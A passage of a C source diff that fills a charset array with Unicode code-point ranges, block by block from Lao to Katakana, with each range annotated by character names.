+	c = 0xed0;		// from LAO DIGIT ZERO
+	while (c <= 0xed9)	// ..to LAO DIGIT NINE
+		charset[i++] = c++;
+	c = 0xedc;		// from LAO HO NO
+	while (c <= 0xedf)	// ..to LAO LETTER KHMU NYO
+		charset[i++] = c++;
+// 0F00..0FFF; Tibetan
+	c = 0xf00;		// from TIBETAN SYLLABLE OM
+	while (c <= 0xf47)	// ..to TIBETAN LETTER JA
+		charset[i++] = c++;
+	c = 0xf49;		// from TIBETAN LETTER NYA
+	while (c <= 0xf6c)	// ..to TIBETAN LETTER RRA
+		charset[i++] = c++;
+	c = 0xf71;		// from TIBETAN VOWEL SIGN AA
+	while (c <= 0xf97)	// ..to TIBETAN SUBJOINED LETTER JA
+		charset[i++] = c++;
+	c = 0xf99;		// from TIBETAN SUBJOINED LETTER NYA
+	while (c <= 0xfbc)	// ..to TIBETAN SUBJOINED LETTER FIXED-FORM RA
+		charset[i++] = c++;
+	c = 0xfbe;		// from TIBETAN KU RU KHA
+	while (c <= 0xfcc)	// ..to TIBETAN SYMBOL NOR BU BZHI -KHYIL
+		charset[i++] = c++;
+	c = 0xfce;		// from TIBETAN SIGN RDEL NAG RDEL DKAR
+	while (c <= 0xfda)	// ..to TIBETAN MARK TRAILING MCHAN RTAGS
+		charset[i++] = c++;
+// 1000..109F; Myanmar
+	c = 0x1000;		// from MYANMAR LETTER KA
+	while (c <= 0x109f)	// ..to MYANMAR SYMBOL SHAN EXCLAMATION
+		charset[i++] = c++;
+// 10A0..10FF; Georgian
+	c = 0x10a0;		// from GEORGIAN CAPITAL LETTER AN
+	while (c <= 0x10c5)	// ..to GEORGIAN CAPITAL LETTER HOE
+		charset[i++] = c++;
+	c = 0x10d0;		// from GEORGIAN LETTER AN
+	while (c <= 0x10ff)	// ..to GEORGIAN LETTER LABIAL SIGN
+		charset[i++] = c++;
+// 1100..11FF; Hangul Jamo
+	c = 0x1100;		// from HANGUL CHOSEONG KIYEOK
+	while (c <= 0x11ff)	// ..to HANGUL JONGSEONG SSANGNIEUN
+		charset[i++] = c++;
+// 1200..137F; Ethiopic
+	c = 0x1200;		// from ETHIOPIC SYLLABLE HA
+	while (c <= 0x1248)	// ..to ETHIOPIC SYLLABLE QWA
+		charset[i++] = c++;
+	c = 0x124a;		// from ETHIOPIC SYLLABLE QWI
+	while (c <= 0x124d)	// ..to ETHIOPIC SYLLABLE QWE
+		charset[i++] = c++;
+	c = 0x1250;		// from ETHIOPIC SYLLABLE QHA
+	while (c <= 0x1256)	// ..to ETHIOPIC SYLLABLE QHO
+		charset[i++] = c++;
+	c = 0x125a;		// from ETHIOPIC SYLLABLE QHWI
+	while (c <= 0x125d)	// ..to ETHIOPIC SYLLABLE QHWE
+		charset[i++] = c++;
+	c = 0x1260;		// from ETHIOPIC SYLLABLE BA
+	while (c <= 0x1288)	// ..to ETHIOPIC SYLLABLE XWA
+		charset[i++] = c++;
+	c = 0x128a;		// from ETHIOPIC SYLLABLE XWI
+	while (c <= 0x128d)	// ..to ETHIOPIC SYLLABLE XWE
+		charset[i++] = c++;
+	c = 0x1290;		// from ETHIOPIC SYLLABLE NA
+	while (c <= 0x12b0)	// ..to ETHIOPIC SYLLABLE KWA
+		charset[i++] = c++;
+	c = 0x12b2;		// from ETHIOPIC SYLLABLE KWI
+	while (c <= 0x12b5)	// ..to ETHIOPIC SYLLABLE KWE
+		charset[i++] = c++;
+	c = 0x12b8;		// from ETHIOPIC SYLLABLE KXA
+	while (c <= 0x12be)	// ..to ETHIOPIC SYLLABLE KXO
+		charset[i++] = c++;
+	c = 0x12c2;		// from ETHIOPIC SYLLABLE KXWI
+	while (c <= 0x12c5)	// ..to ETHIOPIC SYLLABLE KXWE
+		charset[i++] = c++;
+	c = 0x12c8;		// from ETHIOPIC SYLLABLE WA
+	while (c <= 0x12d6)	// ..to ETHIOPIC SYLLABLE PHARYNGEAL O
+		charset[i++] = c++;
+	c = 0x12d8;		// from ETHIOPIC SYLLABLE ZA
+	while (c <= 0x1310)	// ..to ETHIOPIC SYLLABLE GWA
+		charset[i++] = c++;
+	c = 0x1312;		// from ETHIOPIC SYLLABLE GWI
+	while (c <= 0x1315)	// ..to ETHIOPIC SYLLABLE GWE
+		charset[i++] = c++;
+	c = 0x1318;		// from ETHIOPIC SYLLABLE GGA
+	while (c <= 0x135a)	// ..to ETHIOPIC SYLLABLE FYA
+		charset[i++] = c++;
+	c = 0x135d;		// from ETHIOPIC COMBINING GEMINATION AND VOWEL LENGTH MARK
+	while (c <= 0x137c)	// ..to ETHIOPIC NUMBER TEN THOUSAND
+		charset[i++] = c++;
+// 1380..139F; Ethiopic Supplement
+	c = 0x1380;		// from ETHIOPIC SYLLABLE SEBATBEIT MWA
+	while (c <= 0x1399)	// ..to ETHIOPIC TONAL MARK KURT
+		charset[i++] = c++;
+// 13A0..13FF; Cherokee
+	c = 0x13a0;		// from CHEROKEE LETTER A
+	while (c <= 0x13f5)	// ..to CHEROKEE LETTER MV
+		charset[i++] = c++;
+	c = 0x13f8;		// from CHEROKEE SMALL LETTER YE
+	while (c <= 0x13fd)	// ..to CHEROKEE SMALL LETTER MV
+		charset[i++] = c++;
+// 1400..167F; Unified Canadian Aboriginal Syllabics
+	c = 0x1400;		// from CANADIAN SYLLABICS HYPHEN
+	while (c <= 0x167f)	// ..to CANADIAN SYLLABICS BLACKFOOT W
+		charset[i++] = c++;
+// 1680..169F; Ogham
+	c = 0x1680;		// from OGHAM SPACE MARK
+	while (c <= 0x169c)	// ..to OGHAM REVERSED FEATHER MARK
+		charset[i++] = c++;
+// 16A0..16FF; Runic
+	c = 0x16a0;		// from RUNIC LETTER FEHU FEOH FE F
+	while (c <= 0x16f8)	// ..to RUNIC LETTER FRANKS CASKET AESC
+		charset[i++] = c++;
+// 1700..171F; Tagalog
+	c = 0x1700;		// from TAGALOG LETTER A
+	while (c <= 0x170c)	// ..to TAGALOG LETTER YA
+		charset[i++] = c++;
+	c = 0x170e;		// from TAGALOG LETTER LA
+	while (c <= 0x1714)	// ..to TAGALOG SIGN VIRAMA
+		charset[i++] = c++;
+// 1720..173F; Hanunoo
+	c = 0x1720;		// from HANUNOO LETTER A
+	while (c <= 0x1736)	// ..to PHILIPPINE DOUBLE PUNCTUATION
+		charset[i++] = c++;
+// 1740..175F; Buhid
+	c = 0x1740;		// from BUHID LETTER A
+	while (c <= 0x1753)	// ..to BUHID VOWEL SIGN U
+		charset[i++] = c++;
+// 1760..177F; Tagbanwa
+	c = 0x1760;		// from TAGBANWA LETTER A
+	while (c <= 0x176c)	// ..to TAGBANWA LETTER YA
+		charset[i++] = c++;
+	charset[i++] = 0x176e;	// TAGBANWA LETTER LA
+	charset[i++] = 0x1770;	// TAGBANWA LETTER SA
+	charset[i++] = 0x1772;	// TAGBANWA VOWEL SIGN I
+	charset[i++] = 0x1773;	// TAGBANWA VOWEL SIGN U
+// 1780..17FF; Khmer
+	c = 0x1780;		// from KHMER LETTER KA
+	while (c <= 0x17dd)	// ..to KHMER SIGN ATTHACAN
+		charset[i++] = c++;
+	c = 0x17e0;		// from KHMER DIGIT ZERO
+	while (c <= 0x17e9)	// ..to KHMER DIGIT NINE
+		charset[i++] = c++;
+	c = 0x17f0;		// from KHMER SYMBOL LEK ATTAK SON
+	while (c <= 0x17f9)	// ..to KHMER SYMBOL LEK ATTAK PRAM-BUON
+		charset[i++] = c++;
+// 1800..18AF; Mongolian
+	c = 0x1800;		// from MONGOLIAN BIRGA
+	while (c <= 0x180e)	// ..to MONGOLIAN VOWEL SEPARATOR
+		charset[i++] = c++;
+	c = 0x1810;		// from MONGOLIAN DIGIT ZERO
+	while (c <= 0x1819)	// ..to MONGOLIAN DIGIT NINE
+		charset[i++] = c++;
+	c = 0x1820;		// from MONGOLIAN LETTER A
+	while (c <= 0x1878)	// ..to MONGOLIAN LETTER CHA WITH TWO DOTS
+		charset[i++] = c++;
+	c = 0x1880;		// from MONGOLIAN LETTER ALI GALI ANUSVARA ONE
+	while (c <= 0x18aa)	// ..to MONGOLIAN LETTER MANCHU ALI GALI LHA
+		charset[i++] = c++;
+// 18B0..18FF; Unified Canadian Aboriginal Syllabics Extended
+	c = 0x18b0;		// from CANADIAN SYLLABICS OY
+	while (c <= 0x18f5)	// ..to CANADIAN SYLLABICS CARRIER DENTAL S
+		charset[i++] = c++;
+// 1900..194F; Limbu
+	c = 0x1900;		// from LIMBU VOWEL-CARRIER LETTER
+	while (c <= 0x191e)	// ..to LIMBU LETTER TRA
+		charset[i++] = c++;
+	c = 0x1920;		// from LIMBU VOWEL SIGN A
+	while (c <= 0x192b)	// ..to LIMBU SUBJOINED LETTER WA
+		charset[i++] = c++;
+	c = 0x1930;		// from LIMBU SMALL LETTER KA
+	while (c <= 0x193b)	// ..to LIMBU SIGN SA-I
+		charset[i++] = c++;
+	c = 0x1944;		// from LIMBU EXCLAMATION MARK
+	while (c <= 0x194f)	// ..to LIMBU DIGIT NINE
+		charset[i++] = c++;
+// 1950..197F; Tai Le
+	c = 0x1950;		// from TAI LE LETTER KA
+	while (c <= 0x196d)	// ..to TAI LE LETTER AI
+		charset[i++] = c++;
+	c = 0x1970;		// from TAI LE LETTER TONE-2
+	while (c <= 0x1974)	// ..to TAI LE LETTER TONE-6
+		charset[i++] = c++;
+// 1980..19DF; New Tai Lue
+	c = 0x1980;		// from NEW TAI LUE LETTER HIGH QA
+	while (c <= 0x19ab)	// ..to NEW TAI LUE LETTER LOW SUA
+		charset[i++] = c++;
+	c = 0x19b0;		// from NEW TAI LUE VOWEL SIGN VOWEL SHORTENER
+	while (c <= 0x19c9)	// ..to NEW TAI LUE TONE MARK-2
+		charset[i++] = c++;
+	c = 0x19d0;		// from NEW TAI LUE DIGIT ZERO
+	while (c <= 0x19da)	// ..to NEW TAI LUE THAM DIGIT ONE
+		charset[i++] = c++;
+	charset[i++] = 0x19de;	// NEW TAI LUE SIGN LAE
+	charset[i++] = 0x19df;	// NEW TAI LUE SIGN LAEV
+// 19E0..19FF; Khmer Symbols
+	c = 0x19e0;		// from KHMER SYMBOL PATHAMASAT
+	while (c <= 0x19ff)	// ..to KHMER SYMBOL DAP-PRAM ROC
+		charset[i++] = c++;
+// 1A00..1A1F; Buginese
+	c = 0x1a00;		// from BUGINESE LETTER KA
+	while (c <= 0x1a1b)	// ..to BUGINESE VOWEL SIGN AE
+		charset[i++] = c++;
+	charset[i++] = 0x1a1e;	// BUGINESE PALLAWA
+	charset[i++] = 0x1a1f;	// BUGINESE END OF SECTION
+// 1A20..1AAF; Tai Tham
+	c = 0x1a20;		// from TAI THAM LETTER HIGH KA
+	while (c <= 0x1a5e)	// ..to TAI THAM CONSONANT SIGN SA
+		charset[i++] = c++;
+	c = 0x1a60;		// from TAI THAM SIGN SAKOT
+	while (c <= 0x1a7c)	// ..to TAI THAM SIGN KHUEN-LUE KARAN
+		charset[i++] = c++;
+	c = 0x1a7f;		// from TAI THAM COMBINING CRYPTOGRAMMIC DOT
+	while (c <= 0x1a89)	// ..to TAI THAM HORA DIGIT NINE
+		charset[i++] = c++;
+	c = 0x1a90;		// from TAI THAM THAM DIGIT ZERO
+	while (c <= 0x1a99)	// ..to TAI THAM THAM DIGIT NINE
+		charset[i++] = c++;
+	c = 0x1aa0;		// from TAI THAM SIGN WIANG
+	while (c <= 0x1aad)	// ..to TAI THAM SIGN CAANG
+		charset[i++] = c++;
+// 1AB0..1AFF; Combining Diacritical Marks Extended
+	c = 0x1ab0;		// from COMBINING DOUBLED CIRCUMFLEX ACCENT
+	while (c <= 0x1abe)	// ..to COMBINING PARENTHESES OVERLAY
+		charset[i++] = c++;
+// 1B00..1B7F; Balinese
+	c = 0x1b00;		// from BALINESE SIGN ULU RICEM
+	while (c <= 0x1b4b)	// ..to BALINESE LETTER ASYURA SASAK
+		charset[i++] = c++;
+	c = 0x1b50;		// from BALINESE DIGIT ZERO
+	while (c <= 0x1b7c)	// ..to BALINESE MUSICAL SYMBOL LEFT-HAND OPEN PING
+		charset[i++] = c++;
+// 1B80..1BBF; Sundanese
+	c = 0x1b80;		// from SUNDANESE SIGN PANYECEK
+	while (c <= 0x1bbf)	// ..to SUNDANESE LETTER FINAL M
+		charset[i++] = c++;
+// 1BC0..1BFF; Batak
+	c = 0x1bc0;		// from BATAK LETTER A
+	while (c <= 0x1bf3)	// ..to BATAK PANONGONAN
+		charset[i++] = c++;
+	c = 0x1bfc;		// from BATAK SYMBOL BINDU NA METEK
+	while (c <= 0x1bff)	// ..to BATAK SYMBOL BINDU PANGOLAT
+		charset[i++] = c++;
+// 1C00..1C4F; Lepcha
+	c = 0x1c00;		// from LEPCHA LETTER KA
+	while (c <= 0x1c37)	// ..to LEPCHA SIGN NUKTA
+		charset[i++] = c++;
+	c = 0x1c3b;		// from LEPCHA PUNCTUATION TA-ROL
+	while (c <= 0x1c49)	// ..to LEPCHA DIGIT NINE
+		charset[i++] = c++;
+	charset[i++] = 0x1c4d;	// LEPCHA LETTER TTA
+	charset[i++] = 0x1c4f;	// LEPCHA LETTER DDA
+// 1C50..1C7F; Ol Chiki
+	c = 0x1c50;		// from OL CHIKI DIGIT ZERO
+	while (c <= 0x1c7f)	// ..to OL CHIKI PUNCTUATION DOUBLE MUCAAD
+		charset[i++] = c++;
+// 1C80..1C8F; Cyrillic Extended-C
+	c = 0x1c80;		// from CYRILLIC SMALL LETTER ROUNDED VE
+	while (c <= 0x1c88)	// ..to CYRILLIC SMALL LETTER UNBLENDED UK
+		charset[i++] = c++;
+// 1C90..1CBF; Georgian Extended
+	c = 0x1c90;		// from GEORGIAN MTAVRULI CAPITAL LETTER AN
+	while (c <= 0x1cba)	// ..to GEORGIAN MTAVRULI CAPITAL LETTER AIN
+		charset[i++] = c++;
+	charset[i++] = 0x1cbd;	// GEORGIAN MTAVRULI CAPITAL LETTER AEN
+	charset[i++] = 0x1cbf;	// GEORGIAN MTAVRULI CAPITAL LETTER LABIAL SIGN
+// 1CC0..1CCF; Sundanese Supplement
+	c = 0x1cc0;		// from SUNDANESE PUNCTUATION BINDU SURYA
+	while (c <= 0x1cc7)	// ..to SUNDANESE PUNCTUATION BINDU BA SATANGA
+		charset[i++] = c++;
+// 1CD0..1CFF; Vedic Extensions
+	c = 0x1cd0;		// from VEDIC TONE KARSHANA
+	while (c <= 0x1cf9)	// ..to VEDIC TONE DOUBLE RING ABOVE
+		charset[i++] = c++;
+// 1D00..1D7F; Phonetic Extensions
+	c = 0x1d00;		// from LATIN LETTER SMALL CAPITAL A
+	while (c <= 0x1d7f)	// ..to LATIN SMALL LETTER UPSILON WITH STROKE
+		charset[i++] = c++;
+// 1D80..1DBF; Phonetic Extensions Supplement
+	c = 0x1d80;		// from LATIN SMALL LETTER B WITH PALATAL HOOK
+	while (c <= 0x1dbf)	// ..to MODIFIER LETTER SMALL THETA
+		charset[i++] = c++;
+// 1DC0..1DFF; Combining Diacritical Marks Supplement
+	c = 0x1dc0;		// from COMBINING DOTTED GRAVE ACCENT
+	while (c <= 0x1df9)	// ..to COMBINING WIDE INVERTED BRIDGE BELOW
+		charset[i++] = c++;
+	c = 0x1dfb;		// from COMBINING DELETION MARK
+	while (c <= 0x1dff)	// ..to COMBINING RIGHT ARROWHEAD AND DOWN ARROWHEAD BELOW
+		charset[i++] = c++;
+// 1E00..1EFF; Latin Extended Additional
+	c = 0x1e00;		// from LATIN CAPITAL LETTER A WITH RING BELOW
+	while (c <= 0x1eff)	// ..to LATIN SMALL LETTER Y WITH LOOP
+		charset[i++] = c++;
+// 1F00..1FFF; Greek Extended
+	c = 0x1f00;		// from GREEK SMALL LETTER ALPHA WITH PSILI
+	while (c <= 0x1f15)	// ..to GREEK SMALL LETTER EPSILON WITH DASIA AND OXIA
+		charset[i++] = c++;
+	c = 0x1f18;		// from GREEK CAPITAL LETTER EPSILON WITH PSILI
+	while (c <= 0x1f1d)	// ..to GREEK CAPITAL LETTER EPSILON WITH DASIA AND OXIA
+		charset[i++] = c++;
+	c = 0x1f20;		// from GREEK SMALL LETTER ETA WITH PSILI
+	while (c <= 0x1f45)	// ..to GREEK SMALL LETTER OMICRON WITH DASIA AND OXIA
+		charset[i++] = c++;
+	c = 0x1f48;		// from GREEK CAPITAL LETTER OMICRON WITH PSILI
+	while (c <= 0x1f4d)	// ..to GREEK CAPITAL LETTER OMICRON WITH DASIA AND OXIA
+		charset[i++] = c++;
+	c = 0x1f50;		// from GREEK SMALL LETTER UPSILON WITH PSILI
+	while (c <= 0x1f57)	// ..to GREEK SMALL LETTER UPSILON WITH DASIA AND PERISPOMENI
+		charset[i++] = c++;
+	c = 0x1f5f;		// from GREEK CAPITAL LETTER UPSILON WITH DASIA AND PERISPOMENI
+	while (c <= 0x1f7d)	// ..to GREEK SMALL LETTER OMEGA WITH OXIA
+		charset[i++] = c++;
+	c = 0x1f80;		// from GREEK SMALL LETTER ALPHA WITH PSILI AND YPOGEGRAMMENI
+	while (c <= 0x1fb4)	// ..to GREEK SMALL LETTER ALPHA WITH OXIA AND YPOGEGRAMMENI
+		charset[i++] = c++;
+	c = 0x1fb6;		// from GREEK SMALL LETTER ALPHA WITH PERISPOMENI
+	while (c <= 0x1fc4)	// ..to GREEK SMALL LETTER ETA WITH OXIA AND YPOGEGRAMMENI
+		charset[i++] = c++;
+	c = 0x1fc6;		// from GREEK SMALL LETTER ETA WITH PERISPOMENI
+	while (c <= 0x1fd3)	// ..to GREEK SMALL LETTER IOTA WITH DIALYTIKA AND OXIA
+		charset[i++] = c++;
+	c = 0x1fd6;		// from GREEK SMALL LETTER IOTA WITH PERISPOMENI
+	while (c <= 0x1fdb)	// ..to GREEK CAPITAL LETTER IOTA WITH OXIA
+		charset[i++] = c++;
+	c = 0x1fdd;		// from GREEK DASIA AND VARIA
+	while (c <= 0x1fef)	// ..to GREEK VARIA
+		charset[i++] = c++;
+	charset[i++] = 0x1ff2;	// GREEK SMALL LETTER OMEGA WITH VARIA AND YPOGEGRAMMENI
+	charset[i++] = 0x1ff4;	// GREEK SMALL LETTER OMEGA WITH OXIA AND YPOGEGRAMMENI
+	c = 0x1ff6;		// from GREEK SMALL LETTER OMEGA WITH PERISPOMENI
+	while (c <= 0x1ffe)	// ..to GREEK DASIA
+		charset[i++] = c++;
+// 2000..206F; General Punctuation
+	c = 0x2000;		// from EN QUAD
+	while (c <= 0x2064)	// ..to INVISIBLE PLUS
+		charset[i++] = c++;
+	c = 0x2066;		// from LEFT-TO-RIGHT ISOLATE
+	while (c <= 0x206f)	// ..to NOMINAL DIGIT SHAPES
+		charset[i++] = c++;
+// 2070..209F; Superscripts and Subscripts
+	charset[i++] = 0x2070;	// SUPERSCRIPT ZERO
+	charset[i++] = 0x2071;	// SUPERSCRIPT LATIN SMALL LETTER I
+	c = 0x2074;		// from SUPERSCRIPT FOUR
+	while (c <= 0x208e)	// ..to SUBSCRIPT RIGHT PARENTHESIS
+		charset[i++] = c++;
+	c = 0x2090;		// from LATIN SUBSCRIPT SMALL LETTER A
+	while (c <= 0x209c)	// ..to LATIN SUBSCRIPT SMALL LETTER T
+		charset[i++] = c++;
+// 20A0..20CF; Currency Symbols
+	c = 0x20a0;		// from EURO-CURRENCY SIGN
+	while (c <= 0x20bf)	// ..to BITCOIN SIGN
+		charset[i++] = c++;
+// 20D0..20FF; Combining Diacritical Marks for Symbols
+	c = 0x20d0;		// from COMBINING LEFT HARPOON ABOVE
+	while (c <= 0x20f0)	// ..to COMBINING ASTERISK ABOVE
+		charset[i++] = c++;
+// 2100..214F; Letterlike Symbols
+	c = 0x2100;		// from ACCOUNT OF
+	while (c <= 0x214f)	// ..to SYMBOL FOR SAMARITAN SOURCE
+		charset[i++] = c++;
+// 2150..218F; Number Forms
+	c = 0x2150;		// from VULGAR FRACTION ONE SEVENTH
+	while (c <= 0x218b)	// ..to TURNED DIGIT THREE
+		charset[i++] = c++;
+// 2190..21FF; Arrows
+	c = 0x2190;		// from LEFTWARDS ARROW
+	while (c <= 0x21ff)	// ..to LEFT RIGHT OPEN-HEADED ARROW
+		charset[i++] = c++;
+// 2200..22FF; Mathematical Operators
+	c = 0x2200;		// from FOR ALL
+	while (c <= 0x22ff)	// ..to Z NOTATION BAG MEMBERSHIP
+		charset[i++] = c++;
+// 2300..23FF; Miscellaneous Technical
+	c = 0x2300;		// from DIAMETER SIGN
+	while (c <= 0x23ff)	// ..to OBSERVER EYE SYMBOL
+		charset[i++] = c++;
+// 2400..243F; Control Pictures
+	c = 0x2400;		// from SYMBOL FOR NULL
+	while (c <= 0x2426)	// ..to SYMBOL FOR SUBSTITUTE FORM TWO
+		charset[i++] = c++;
+// 2440..245F; Optical Character Recognition
+	c = 0x2440;		// from OCR HOOK
+	while (c <= 0x244a)	// ..to OCR DOUBLE BACKSLASH
+		charset[i++] = c++;
+// 2460..24FF; Enclosed Alphanumerics
+	c = 0x2460;		// from CIRCLED DIGIT ONE
+	while (c <= 0x24ff)	// ..to NEGATIVE CIRCLED DIGIT ZERO
+		charset[i++] = c++;
+// 2500..257F; Box Drawing
+	c = 0x2500;		// from BOX DRAWINGS LIGHT HORIZONTAL
+	while (c <= 0x257f)	// ..to BOX DRAWINGS HEAVY UP AND LIGHT DOWN
+		charset[i++] = c++;
+// 2580..259F; Block Elements
+	c = 0x2580;		// from UPPER HALF BLOCK
+	while (c <= 0x259f)	// ..to QUADRANT UPPER RIGHT AND LOWER LEFT AND LOWER RIGHT
+		charset[i++] = c++;
+// 25A0..25FF; Geometric Shapes
+	c = 0x25a0;		// from BLACK SQUARE
+	while (c <= 0x25ff)	// ..to LOWER RIGHT TRIANGLE
+		charset[i++] = c++;
+// 2600..26FF; Miscellaneous Symbols
+	c = 0x2600;		// from BLACK SUN WITH RAYS
+	while (c <= 0x26ff)	// ..to WHITE FLAG WITH HORIZONTAL MIDDLE BLACK STRIPE
+		charset[i++] = c++;
+// 2700..27BF; Dingbats
+	c = 0x2700;		// from BLACK SAFETY SCISSORS
+	while (c <= 0x27bf)	// ..to DOUBLE CURLY LOOP
+		charset[i++] = c++;
+// 27C0..27EF; Miscellaneous Mathematical Symbols-A
+	c = 0x27c0;		// from THREE DIMENSIONAL ANGLE
+	while (c <= 0x27ef)	// ..to MATHEMATICAL RIGHT FLATTENED PARENTHESIS
+		charset[i++] = c++;
+// 27F0..27FF; Supplemental Arrows-A
+	c = 0x27f0;		// from UPWARDS QUADRUPLE ARROW
+	while (c <= 0x27ff)	// ..to LONG RIGHTWARDS SQUIGGLE ARROW
+		charset[i++] = c++;
+// 2800..28FF; Braille Patterns
+	c = 0x2800;		// from BRAILLE PATTERN BLANK
+	while (c <= 0x28ff)	// ..to BRAILLE PATTERN DOTS-12345678
+		charset[i++] = c++;
+// 2900..297F; Supplemental Arrows-B
+	c = 0x2900;		// from RIGHTWARDS TWO-HEADED ARROW WITH VERTICAL STROKE
+	while (c <= 0x297f)	// ..to DOWN FISH TAIL
+		charset[i++] = c++;
+// 2980..29FF; Miscellaneous Mathematical Symbols-B
+	c = 0x2980;		// from TRIPLE VERTICAL BAR DELIMITER
+	while (c <= 0x29ff)	// ..to MINY
+		charset[i++] = c++;
+// 2A00..2AFF; Supplemental Mathematical Operators
+	c = 0x2a00;		// from N-ARY CIRCLED DOT OPERATOR
+	while (c <= 0x2aff)	// ..to N-ARY WHITE VERTICAL BAR
+		charset[i++] = c++;
+// 2B00..2BFF; Miscellaneous Symbols and Arrows
+	c = 0x2b00;		// from NORTH EAST WHITE ARROW
+	while (c <= 0x2b73)	// ..to DOWNWARDS TRIANGLE-HEADED ARROW TO BAR
+		charset[i++] = c++;
+	c = 0x2b76;		// from NORTH WEST TRIANGLE-HEADED ARROW TO BAR
+	while (c <= 0x2b95)	// ..to RIGHTWARDS BLACK ARROW
+		charset[i++] = c++;
+	c = 0x2b98;		// from THREE-D TOP-LIGHTED LEFTWARDS EQUILATERAL ARROWHEAD
+	while (c <= 0x2bc8)	// ..to BLACK MEDIUM RIGHT-POINTING TRIANGLE CENTRED
+		charset[i++] = c++;
+	c = 0x2bca;		// from TOP HALF BLACK CIRCLE
+	while (c <= 0x2bfe)	// ..to REVERSED RIGHT ANGLE
+		charset[i++] = c++;
+// 2C00..2C5F; Glagolitic
+	c = 0x2c00;		// from GLAGOLITIC CAPITAL LETTER AZU
+	while (c <= 0x2c2e)	// ..to GLAGOLITIC CAPITAL LETTER LATINATE MYSLITE
+		charset[i++] = c++;
+	c = 0x2c30;		// from GLAGOLITIC SMALL LETTER AZU
+	while (c <= 0x2c5e)	// ..to GLAGOLITIC SMALL LETTER LATINATE MYSLITE
+		charset[i++] = c++;
+// 2C60..2C7F; Latin Extended-C
+	c = 0x2c60;		// from LATIN CAPITAL LETTER L WITH DOUBLE BAR
+	while (c <= 0x2c7f)	// ..to LATIN CAPITAL LETTER Z WITH SWASH TAIL
+		charset[i++] = c++;
+// 2C80..2CFF; Coptic
+	c = 0x2c80;		// from COPTIC CAPITAL LETTER ALFA
+	while (c <= 0x2cf3)	// ..to COPTIC SMALL LETTER BOHAIRIC KHEI
+		charset[i++] = c++;
+	c = 0x2cf9;		// from COPTIC OLD NUBIAN FULL STOP
+	while (c <= 0x2cff)	// ..to COPTIC MORPHOLOGICAL DIVIDER
+		charset[i++] = c++;
+// 2D00..2D2F; Georgian Supplement
+	c = 0x2d00;		// from GEORGIAN SMALL LETTER AN
+	while (c <= 0x2d25)	// ..to GEORGIAN SMALL LETTER HOE
+		charset[i++] = c++;
+	c = 0x2d27;		// from GEORGIAN SMALL LETTER YN
+	while (c <= 0x2d2d)	// ..to GEORGIAN SMALL LETTER AEN
+		charset[i++] = c++;
+// 2D30..2D7F; Tifinagh
+	c = 0x2d30;		// from TIFINAGH LETTER YA
+	while (c <= 0x2d67)	// ..to TIFINAGH LETTER YO
+		charset[i++] = c++;
+	charset[i++] = 0x2d6f;	// TIFINAGH MODIFIER LETTER LABIALIZATION MARK
+	charset[i++] = 0x2d70;	// TIFINAGH SEPARATOR MARK
+	charset[i++] = 0x2d7f;	// TIFINAGH CONSONANT JOINER
+// 2D80..2DDF; Ethiopic Extended
+	c = 0x2d80;		// from ETHIOPIC SYLLABLE LOA
+	while (c <= 0x2d96)	// ..to ETHIOPIC SYLLABLE GGWE
+		charset[i++] = c++;
+	c = 0x2da0;		// from ETHIOPIC SYLLABLE SSA
+	while (c <= 0x2da6)	// ..to ETHIOPIC SYLLABLE SSO
+		charset[i++] = c++;
+	c = 0x2da8;		// from ETHIOPIC SYLLABLE CCA
+	while (c <= 0x2dae)	// ..to ETHIOPIC SYLLABLE CCO
+		charset[i++] = c++;
+	c = 0x2db0;		// from ETHIOPIC SYLLABLE ZZA
+	while (c <= 0x2db6)	// ..to ETHIOPIC SYLLABLE ZZO
+		charset[i++] = c++;
+	c = 0x2db8;		// from ETHIOPIC SYLLABLE CCHA
+	while (c <= 0x2dbe)	// ..to ETHIOPIC SYLLABLE CCHO
+		charset[i++] = c++;
+	c = 0x2dc0;		// from ETHIOPIC SYLLABLE QYA
+	while (c <= 0x2dc6)	// ..to ETHIOPIC SYLLABLE QYO
+		charset[i++] = c++;
+	c = 0x2dc8;		// from ETHIOPIC SYLLABLE KYA
+	while (c <= 0x2dce)	// ..to ETHIOPIC SYLLABLE KYO
+		charset[i++] = c++;
+	c = 0x2dd0;		// from ETHIOPIC SYLLABLE XYA
+	while (c <= 0x2dd6)	// ..to ETHIOPIC SYLLABLE XYO
+		charset[i++] = c++;
+	c = 0x2dd8;		// from ETHIOPIC SYLLABLE GYA
+	while (c <= 0x2dde)	// ..to ETHIOPIC SYLLABLE GYO
+		charset[i++] = c++;
+// 2DE0..2DFF; Cyrillic Extended-A
+	c = 0x2de0;		// from COMBINING CYRILLIC LETTER BE
+	while (c <= 0x2dff)	// ..to COMBINING CYRILLIC LETTER IOTIFIED BIG YUS
+		charset[i++] = c++;
+// 2E00..2E7F; Supplemental Punctuation
+	c = 0x2e00;		// from RIGHT ANGLE SUBSTITUTION MARKER
+	while (c <= 0x2e4e)	// ..to PUNCTUS ELEVATUS MARK
+		charset[i++] = c++;
+// 2E80..2EFF; CJK Radicals Supplement
+	c = 0x2e80;		// from CJK RADICAL REPEAT
+	while (c <= 0x2e99)	// ..to CJK RADICAL RAP
+		charset[i++] = c++;
+	c = 0x2e9b;		// from CJK RADICAL CHOKE
+	while (c <= 0x2ef3)	// ..to CJK RADICAL C-SIMPLIFIED TURTLE
+		charset[i++] = c++;
+// 2F00..2FDF; Kangxi Radicals
+	c = 0x2f00;		// from KANGXI RADICAL ONE
+	while (c <= 0x2fd5)	// ..to KANGXI RADICAL FLUTE
+		charset[i++] = c++;
+// 2FF0..2FFF; Ideographic Description Characters
+	c = 0x2ff0;		// from IDEOGRAPHIC DESCRIPTION CHARACTER LEFT TO RIGHT
+	while (c <= 0x2ffb)	// ..to IDEOGRAPHIC DESCRIPTION CHARACTER OVERLAID
+		charset[i++] = c++;
+// 3000..303F; CJK Symbols and Punctuation
+	c = 0x3000;		// from IDEOGRAPHIC SPACE
+	while (c <= 0x303f)	// ..to IDEOGRAPHIC HALF FILL SPACE
+		charset[i++] = c++;
+// 3040..309F; Hiragana
+	c = 0x3041;		// from HIRAGANA LETTER SMALL A
+	while (c <= 0x3096)	// ..to HIRAGANA LETTER SMALL KE
+		charset[i++] = c++;
+	c = 0x3099;		// from COMBINING KATAKANA-HIRAGANA VOICED SOUND MARK
+	while (c <= 0x309f)	// ..to HIRAGANA DIGRAPH YORI
+		charset[i++] = c++;
+// 30A0..30FF; Katakana
+	c = 0x30a0;		// from KATAKANA-HIRAGANA DOUBLE HYPHEN
+	while (c <= 0x30ff)	// ..to KATAKANA DIGRAPH KOTO
+		charset[i++] = c++;
+// 3100..312F; Bopomofo
